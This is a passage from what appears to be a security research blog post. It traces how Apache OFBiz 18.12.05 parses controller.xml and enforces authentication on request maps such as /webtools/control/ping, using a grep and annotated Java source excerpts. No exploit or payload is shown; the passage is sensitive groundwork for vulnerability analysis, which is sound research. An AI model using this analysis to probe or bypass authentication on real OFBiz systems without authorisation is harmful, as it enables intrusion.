mandatory for accessing the <code class="language-plaintext highlighter-rouge">/ping</code> endpoint.</li> <li>The <code class="language-plaintext highlighter-rouge">event</code> element defines the event to be triggered when the specified URI is accessed.</li> <li>The <code class="language-plaintext highlighter-rouge">response</code> element specifies the response to be rendered.</li> </ul> <p>So it’s clear that in order to hit the <code class="language-plaintext highlighter-rouge">/ping</code> endpoint, we would need to be authenticated and hit the following API endpoint <code class="language-plaintext highlighter-rouge">/webtools/control/ping</code>. Firing up the browser and visiting <a href="https://localhost:8443/webtools/control/ping" target="_blank">https://localhost:8443/webtools/control/ping</a> will redirect us to the login page.</p> <p>Let’s go deeper to understand how <code class="language-plaintext highlighter-rouge">controller.xml</code> is being parsed. Grepping through the source code for controller.xml, we can see some interesting result:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"controller.xml"</span> <span class="nb">.</span> <span class="nt">--include</span> <span class="s2">"*.java"</span></code></pre></figure> <p>The result of the above command will give us a list of all java files who has controller.xml as a string inside it.</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./framework/widget/src/main/java/org/apache/ofbiz/widget/renderer/ScreenRenderer.java: <span class="k">*</span> @param combinedName A combination of the resource name/location <span class="k">for </span>the screen XML file and the name of the screen within that file, separated by a pound sign <span class="o">(</span><span class="s2">"#"</span><span class="o">)</span><span class="nb">.</span> This is the same format that is used <span class="k">in </span>the view-map elements on the controller.xml file. ./framework/widget/src/main/java/org/apache/ofbiz/widget/WidgetWorker.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/ConfigXMLReader.java: public static final String controllerXmlFileName <span class="o">=</span> <span class="s2">"/WEB-INF/controller.xml"</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/ConfigXMLReader.java: // find controller.xml file with webappMountPoint + <span class="s2">"/WEB-INF"</span> <span class="k">in </span>the path ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/ConfigXMLReader.java: // look through all controller.xml files and find those with the request-uri referred to by the target ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: // FIXME: controller.xml errors should throw an exception. ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: // FIXME: controller.xml errors should throw an exception. ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: // If we can<span class="s1">'t read the controller.xml file, then there is no point in continuing. ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError(e, "Exception thrown while parsing controller.xml file: ", module); ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: // If we can'</span>t <span class="nb">read </span>the controller.xml file, <span class="k">then </span>there is no point <span class="k">in </span>continuing. ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webtools/src/main/java/org/apache/ofbiz/webtools/artifactinfo/ArtifactInfoFactory.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webtools/src/main/java/org/apache/ofbiz/webtools/artifactinfo/ArtifactInfoFactory.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span> ./framework/webtools/src/main/java/org/apache/ofbiz/webtools/artifactinfo/ControllerRequestArtifactInfo.java: <span class="k">if</span> <span class="o">(</span>location.endsWith<span class="o">(</span><span class="s2">"/WEB-INF/controller.xml"</span><span class="o">))</span> <span class="o">{</span> ./framework/webtools/src/main/java/org/apache/ofbiz/webtools/artifactinfo/ControllerViewArtifactInfo.java: <span class="k">if</span> <span class="o">(</span>location.endsWith<span class="o">(</span><span class="s2">"/WEB-INF/controller.xml"</span><span class="o">))</span> <span class="o">{</span> ./applications/product/src/main/java/org/apache/ofbiz/product/category/SeoContextFilter.java: Debug.logError<span class="o">(</span>e, <span class="s2">"Exception thrown while parsing controller.xml file: "</span>, module<span class="o">)</span><span class="p">;</span></code></pre></figure> <p>From the result, we can see some interesting files named <code class="language-plaintext highlighter-rouge">ConfigXMLReader.java</code> and <code class="language-plaintext highlighter-rouge">RequestHandler.java</code> which does parsing of controller.xml. Let’s look into these files deeper and see how it’s parsing the file and handle incoming requests.</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/ConfigXMLReader.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">62</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">String</span> <span class="n">module</span> <span class="o">=</span> <span class="nc">ConfigXMLReader</span><span class="o">.</span><span class="na">class</span><span class="o">.</span><span class="na">getName</span><span class="o">();</span> <span class="mi">63</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kd">final</span> <span class="nc">String</span> <span class="n">controllerXmlFileName</span> <span class="o">=</span> <span class="s">"/WEB-INF/controller.xml"</span><span class="o">;</span> <span class="o">.</span> <span class="o">.</span> <span class="mi">153</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="no">URL</span> <span class="nf">getControllerConfigURL</span><span class="o">(</span><span class="nc">ServletContext</span> <span class="n">context</span><span class="o">)</span> <span class="o">{</span> <span class="mi">154</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">155</span><span class="o">:</span> <span class="k">return</span> <span class="n">context</span><span class="o">.</span><span class="na">getResource</span><span class="o">(</span><span class="n">controllerXmlFileName</span><span class="o">);</span> <span class="mi">156</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">MalformedURLException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">157</span><span class="o">:</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logError</span><span class="o">(</span><span class="n">e</span><span class="o">,</span> <span class="s">"Error Finding XML Config File: "</span> <span class="o">+</span> <span class="n">controllerXmlFileName</span><span class="o">,</span> <span class="n">module</span><span class="o">);</span> <span class="mi">158</span><span class="o">:</span> <span class="k">return</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">159</span><span class="o">:</span> <span class="o">}</span> <span class="mi">160</span><span class="o">:</span> <span class="o">}</span> <span class="o">.</span> <span class="o">.</span> <span class="mi">458</span><span class="o">:</span> <span class="kd">public</span> <span class="kd">static</span> <span class="kd">class</span> <span class="nc">RequestMap</span> <span class="o">{</span> <span class="mi">459</span><span class="o">:</span> <span class="kd">public</span> <span class="nc">String</span> <span class="n">uri</span><span class="o">;</span> <span class="mi">460</span><span class="o">:</span> <span class="kd">public</span> <span class="nc">String</span> <span class="n">method</span><span class="o">;</span> <span class="mi">461</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">edit</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">462</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">trackVisit</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">463</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">trackServerHit</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">464</span><span class="o">:</span> <span class="kd">public</span> <span class="nc">String</span> <span class="n">description</span><span class="o">;</span> <span class="mi">465</span><span class="o">:</span> <span class="kd">public</span> <span class="nc">Event</span> <span class="n">event</span><span class="o">;</span> <span class="mi">466</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">securityHttps</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">467</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">securityAuth</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span> <span class="mi">468</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">securityCert</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span> <span class="mi">469</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">securityExternalView</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">470</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">boolean</span> <span class="n">securityDirectRequest</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span> <span class="mi">471</span><span class="o">:</span> <span class="kd">public</span> <span class="nc">Map</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">,</span> <span class="nc">RequestResponse</span><span class="o">&gt;</span> <span class="n">requestResponseMap</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">HashMap</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">,</span> <span class="nc">RequestResponse</span><span class="o">&gt;();</span> <span class="mi">472</span><span class="o">:</span> <span class="kd">public</span> <span class="nc">Metrics</span> <span class="n">metrics</span> <span class="o">=</span> <span class="kc">null</span><span class="o">;</span> <span class="mi">473</span><span class="o">:</span> <span class="mi">474</span><span class="o">:</span> <span class="kd">public</span> <span class="nf">RequestMap</span><span class="o">(</span><span class="nc">Element</span> <span class="n">requestMapElement</span><span class="o">)</span> <span class="o">{</span> <span class="mi">475</span><span class="o">:</span> <span class="c1">// Get the URI info</span> <span class="mi">476</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">uri</span> <span class="o">=</span> <span class="n">requestMapElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"uri"</span><span class="o">);</span> <span class="mi">477</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">method</span> <span class="o">=</span> <span class="n">requestMapElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"method"</span><span class="o">);</span> <span class="mi">478</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">edit</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"edit"</span><span class="o">));</span> <span class="mi">479</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">trackServerHit</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"track-serverhit"</span><span class="o">));</span> <span class="mi">480</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">trackVisit</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"track-visit"</span><span class="o">));</span> <span class="mi">481</span><span class="o">:</span> <span class="c1">// Check for security</span> <span class="mi">482</span><span class="o">:</span> <span class="nc">Element</span> <span class="n">securityElement</span> <span class="o">=</span> <span class="nc">UtilXml</span><span class="o">.</span><span class="na">firstChildElement</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">,</span> <span class="s">"security"</span><span class="o">);</span> <span class="mi">483</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">securityElement</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="mi">484</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="nc">UtilProperties</span><span class="o">.</span><span class="na">propertyValueEqualsIgnoreCase</span><span class="o">(</span><span class="s">"url"</span><span class="o">,</span> <span class="s">"no.http"</span><span class="o">,</span> <span class="s">"Y"</span><span class="o">))</span> <span class="o">{</span> <span class="mi">485</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">securityHttps</span> <span class="o">=</span> <span class="s">"true"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">securityElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"https"</span><span class="o">));</span> <span class="mi">486</span><span class="o">:</span> <span class="o">}</span> <span class="k">else</span> <span class="o">{</span> <span class="mi">487</span><span class="o">:</span> <span class="nc">String</span> <span class="n">httpRequestMapList</span> <span class="o">=</span> <span class="nc">UtilProperties</span><span class="o">.</span><span class="na">getPropertyValue</span><span class="o">(</span><span class="s">"url"</span><span class="o">,</span> <span class="s">"http.request-map.list"</span><span class="o">);</span> <span class="mi">488</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="nc">UtilValidate</span><span class="o">.</span><span class="na">isNotEmpty</span><span class="o">(</span><span class="n">httpRequestMapList</span><span class="o">))</span> <span class="o">{</span> <span class="mi">489</span><span class="o">:</span> <span class="nc">List</span><span class="o">&lt;</span><span class="nc">String</span><span class="o">&gt;</span> <span class="n">reqList</span> <span class="o">=</span> <span class="nc">StringUtil</span><span class="o">.</span><span class="na">split</span><span class="o">(</span><span class="n">httpRequestMapList</span><span class="o">,</span> <span class="s">","</span><span class="o">);</span> <span class="mi">490</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">reqList</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">uri</span><span class="o">))</span> <span class="o">{</span> <span class="mi">491</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">securityHttps</span> <span class="o">=</span> <span class="s">"true"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">securityElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"https"</span><span class="o">));</span> <span class="mi">492</span><span class="o">:</span> <span class="o">}</span> <span class="mi">493</span><span class="o">:</span> <span class="o">}</span> <span class="mi">494</span><span class="o">:</span> <span class="o">}</span> <span class="mi">495</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">securityAuth</span> <span class="o">=</span> <span class="s">"true"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">securityElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"auth"</span><span class="o">));</span> <span class="mi">496</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">securityCert</span> <span class="o">=</span> <span class="s">"true"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">securityElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"cert"</span><span class="o">));</span> <span class="mi">497</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">securityExternalView</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">securityElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"external-view"</span><span class="o">));</span> <span class="mi">498</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">securityDirectRequest</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equals</span><span class="o">(</span><span class="n">securityElement</span><span class="o">.</span><span class="na">getAttribute</span><span class="o">(</span><span class="s">"direct-request"</span><span class="o">));</span> <span class="mi">499</span><span class="o">:</span> <span class="o">}</span> <span class="mi">500</span><span class="o">:</span> <span class="c1">// Check for event</span> <span class="mi">501</span><span class="o">:</span> <span class="nc">Element</span> <span class="n">eventElement</span> <span class="o">=</span> <span class="nc">UtilXml</span><span class="o">.</span><span class="na">firstChildElement</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">,</span> <span class="s">"event"</span><span class="o">);</span> <span class="mi">502</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">eventElement</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="mi">503</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">event</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Event</span><span class="o">(</span><span class="n">eventElement</span><span class="o">);</span> <span class="mi">504</span><span class="o">:</span> <span class="o">}</span> <span class="mi">505</span><span class="o">:</span> <span class="c1">// Check for description</span> <span class="mi">506</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">description</span> <span class="o">=</span> <span class="nc">UtilXml</span><span class="o">.</span><span class="na">childElementValue</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">,</span> <span class="s">"description"</span><span class="o">);</span> <span class="mi">507</span><span class="o">:</span> <span class="c1">// Get the response(s)</span> <span class="mi">508</span><span class="o">:</span> <span class="k">for</span> <span class="o">(</span><span class="nc">Element</span> <span class="n">responseElement</span> <span class="o">:</span> <span class="nc">UtilXml</span><span class="o">.</span><span class="na">childElementList</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">,</span> <span class="s">"response"</span><span class="o">))</span> <span class="o">{</span> <span class="mi">509</span><span class="o">:</span> <span class="nc">RequestResponse</span> <span class="n">response</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">RequestResponse</span><span class="o">(</span><span class="n">responseElement</span><span class="o">);</span> <span class="mi">510</span><span class="o">:</span> <span class="n">requestResponseMap</span><span class="o">.</span><span class="na">put</span><span class="o">(</span><span class="n">response</span><span class="o">.</span><span class="na">name</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="mi">511</span><span class="o">:</span> <span class="o">}</span> <span class="mi">512</span><span class="o">:</span> <span class="c1">// Get metrics.</span> <span class="mi">513</span><span class="o">:</span> <span class="nc">Element</span> <span class="n">metricsElement</span> <span class="o">=</span> <span class="nc">UtilXml</span><span class="o">.</span><span class="na">firstChildElement</span><span class="o">(</span><span class="n">requestMapElement</span><span class="o">,</span> <span class="s">"metric"</span><span class="o">);</span> <span class="mi">514</span><span class="o">:</span> <span class="k">if</span> <span class="o">(</span><span class="n">metricsElement</span> <span class="o">!=</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span> <span class="mi">515</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">metrics</span> <span class="o">=</span> <span class="nc">MetricsFactory</span><span class="o">.</span><span class="na">getInstance</span><span class="o">(</span><span class="n">metricsElement</span><span class="o">);</span> <span class="mi">516</span><span class="o">:</span> <span class="o">}</span> <span class="mi">517</span><span class="o">:</span> <span class="o">}</span> <span class="mi">518</span><span class="o">:</span> <span class="o">}</span></code></pre></figure> <p>So configXMLReader.java parses the <code class="language-plaintext highlighter-rouge">/WEB-INF/controller.xml</code> and uses the RequestMap class which represents mapping for handling specific HTTP requests. As you can see, if <code class="language-plaintext highlighter-rouge">auth=true</code> is set, then inside the RequestMap object, <code class="language-plaintext highlighter-rouge">this.securityAuth</code> is set to true. Now let’s look at the RequestHandler.java:</p> <p><strong>File</strong>: <em>ofbiz-framework-release18.12.05/framework/webapp/src/main/java/org/apache/ofbiz/webapp/control/RequestHandler.java</em></p> <figure class="highlight"><pre><code class="language-java" data-lang="java"><span class="mi">158</span><span class="o">:</span> <span class="kd">private</span> <span class="nf">RequestHandler</span><span class="o">(</span><span class="nc">ServletContext</span> <span class="n">context</span><span class="o">)</span> <span class="o">{</span> <span class="mi">159</span><span class="o">:</span> <span class="c1">// init the ControllerConfig, but don't save it anywhere, just load it into the cache</span> <span class="mi">160</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">controllerConfigURL</span> <span class="o">=</span> <span class="nc">ConfigXMLReader</span><span class="o">.</span><span class="na">getControllerConfigURL</span><span class="o">(</span><span class="n">context</span><span class="o">);</span> <span class="mi">161</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">162</span><span class="o">:</span> <span class="nc">ConfigXMLReader</span><span class="o">.</span><span class="na">getControllerConfig</span><span class="o">(</span><span class="k">this</span><span class="o">.</span><span class="na">controllerConfigURL</span><span class="o">);</span> <span class="mi">163</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">WebAppConfigurationException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">164</span><span class="o">:</span> <span class="c1">// FIXME: controller.xml errors should throw an exception.</span> <span class="mi">165</span><span class="o">:</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logError</span><span class="o">(</span><span class="n">e</span><span class="o">,</span> <span class="s">"Exception thrown while parsing controller.xml file: "</span><span class="o">,</span> <span class="n">module</span><span class="o">);</span> <span class="mi">166</span><span class="o">:</span> <span class="o">}</span> <span class="mi">167</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">viewFactory</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">ViewFactory</span><span class="o">(</span><span class="n">context</span><span class="o">,</span> <span class="k">this</span><span class="o">.</span><span class="na">controllerConfigURL</span><span class="o">);</span> <span class="mi">168</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">eventFactory</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">EventFactory</span><span class="o">(</span><span class="n">context</span><span class="o">,</span> <span class="k">this</span><span class="o">.</span><span class="na">controllerConfigURL</span><span class="o">);</span> <span class="mi">169</span><span class="o">:</span> <span class="mi">170</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">trackServerHit</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equalsIgnoreCase</span><span class="o">(</span><span class="n">context</span><span class="o">.</span><span class="na">getInitParameter</span><span class="o">(</span><span class="s">"track-serverhit"</span><span class="o">));</span> <span class="mi">171</span><span class="o">:</span> <span class="k">this</span><span class="o">.</span><span class="na">trackVisit</span> <span class="o">=</span> <span class="o">!</span><span class="s">"false"</span><span class="o">.</span><span class="na">equalsIgnoreCase</span><span class="o">(</span><span class="n">context</span><span class="o">.</span><span class="na">getInitParameter</span><span class="o">(</span><span class="s">"track-visit"</span><span class="o">));</span> <span class="mi">172</span><span class="o">:</span> <span class="mi">173</span><span class="o">:</span> <span class="n">hostHeadersAllowed</span> <span class="o">=</span> <span class="nc">UtilMisc</span><span class="o">.</span><span class="na">getHostHeadersAllowed</span><span class="o">();</span> <span class="mi">174</span><span class="o">:</span> <span class="mi">175</span><span class="o">:</span> <span class="o">}</span> <span class="o">.</span> <span class="o">.</span> <span class="mi">240</span><span class="o">:</span> <span class="kd">public</span> <span class="kt">void</span> <span class="nf">doRequest</span><span class="o">(</span><span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">,</span> <span class="nc">String</span> <span class="n">chain</span><span class="o">,</span> <span class="mi">241</span><span class="o">:</span> <span class="nc">GenericValue</span> <span class="n">userLogin</span><span class="o">,</span> <span class="nc">Delegator</span> <span class="n">delegator</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">RequestHandlerException</span><span class="o">,</span> <span class="nc">RequestHandlerExceptionAllowExternalRequests</span> <span class="o">{</span> <span class="mi">242</span><span class="o">:</span> <span class="mi">243</span><span class="o">:</span> <span class="k">if</span> <span class="o">(!</span><span class="n">hostHeadersAllowed</span><span class="o">.</span><span class="na">contains</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getServerName</span><span class="o">()))</span> <span class="o">{</span> <span class="mi">244</span><span class="o">:</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logError</span><span class="o">(</span><span class="s">"Domain "</span> <span class="o">+</span> <span class="n">request</span><span class="o">.</span><span class="na">getServerName</span><span class="o">()</span> <span class="o">+</span> <span class="s">" not accepted to prevent host header injection."</span> <span class="mi">245</span><span class="o">:</span> <span class="o">+</span> <span class="s">" You need to set host-headers-allowed property in security.properties file."</span><span class="o">,</span> <span class="n">module</span><span class="o">);</span> <span class="mi">246</span><span class="o">:</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">RequestHandlerException</span><span class="o">(</span><span class="s">"Domain "</span> <span class="o">+</span> <span class="n">request</span><span class="o">.</span><span class="na">getServerName</span><span class="o">()</span> <span class="o">+</span> <span class="s">" not accepted to prevent host header injection."</span> <span class="mi">247</span><span class="o">:</span> <span class="o">+</span> <span class="s">" You need to set host-headers-allowed property in security.properties file."</span><span class="o">);</span> <span class="mi">248</span><span class="o">:</span> <span class="o">}</span> <span class="mi">249</span><span class="o">:</span> <span class="mi">250</span><span class="o">:</span> <span class="kd">final</span> <span class="kt">boolean</span> <span class="n">throwRequestHandlerExceptionOnMissingLocalRequest</span> <span class="o">=</span> <span class="nc">EntityUtilProperties</span><span class="o">.</span><span class="na">propertyValueEqualsIgnoreCase</span><span class="o">(</span> <span class="mi">251</span><span class="o">:</span> <span class="s">"requestHandler"</span><span class="o">,</span> <span class="s">"throwRequestHandlerExceptionOnMissingLocalRequest"</span><span class="o">,</span> <span class="s">"Y"</span><span class="o">,</span> <span class="n">delegator</span><span class="o">);</span> <span class="mi">252</span><span class="o">:</span> <span class="kt">long</span> <span class="n">startTime</span> <span class="o">=</span> <span class="nc">System</span><span class="o">.</span><span class="na">currentTimeMillis</span><span class="o">();</span> <span class="mi">253</span><span class="o">:</span> <span class="nc">HttpSession</span> <span class="n">session</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="na">getSession</span><span class="o">();</span> <span class="mi">254</span><span class="o">:</span> <span class="mi">255</span><span class="o">:</span> <span class="c1">// Parse controller config.</span> <span class="mi">256</span><span class="o">:</span> <span class="k">try</span> <span class="o">{</span> <span class="mi">257</span><span class="o">:</span> <span class="n">ccfg</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">ControllerConfig</span><span class="o">(</span><span class="n">getControllerConfig</span><span class="o">());</span> <span class="mi">258</span><span class="o">:</span> <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">WebAppConfigurationException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span> <span class="mi">259</span><span class="o">:</span> <span class="nc">Debug</span><span class="o">.</span><span class="na">logError</span><span class="o">(</span><span class="n">e</span><span class="o">,</span> <span class="s">"Exception thrown while parsing controller.xml file: "</span><span class="o">,</span> <span class="n">module</span><span class="o">);</span> <span class="mi">260</span><span class="o">:</span> <span class="k">throw</span> <span class="k">new</span> <span class="nc">RequestHandlerException</span><span class="o">(</span><span class="n">e</span><span class="o">);</span> <span class="mi">261</span><span class="o">:</span> <span class="o">}</span> <span class="mi">262</span><span class="o">:</span> <span class="mi">263</span><span class="o">:</span> <span class="c1">// workaround if we are in the root webapp</span> <span class="mi">264</span><span class="o">:</span> <span class="nc">String</span> <span class="n">cname</span> <span class="o">=</span> <span class="nc">UtilHttp</span><span class="o">.</span><span class="na">getApplicationName</span><span class="o">(</span><span class="n">request</span><span class="o">);</span> <span class="mi">265</span><span class="o">:</span> <span class="mi">266</span><span class="o">:</span> <span class="c1">// Grab data from request object to process</span> <span class="mi">267</span><span class="o">:</span> <span class="nc">String</span> <span class="n">defaultRequestUri</span> <span class="o">=</span> <span class="nc">RequestHandler</span><span class="o">.</span><span class="na">getRequestUri</span><span class="o">(</span><span class="n">request</span><span class="o">.</span><span class="na">getPathInfo</span><span class="o">());</span> <span class="mi">268</span><span class="o">:</span> <span class="mi">269</span><span class="o">:</span> <span class="nc">String</span> <span class="n">requestMissingErrorMessage</span> <span class="o">=</span> <span class="s">"Unknown request ["</span> <span class="mi">270</span><span class="o">:</span> <span class="o">+</span> <span class="n">defaultRequestUri</span> <span class="mi">271</span><span class="o">:</span> <span class="o">+</span> <span class="s">"]; this request does not exist or cannot be called directly."</span><span class="o">;</span> <span 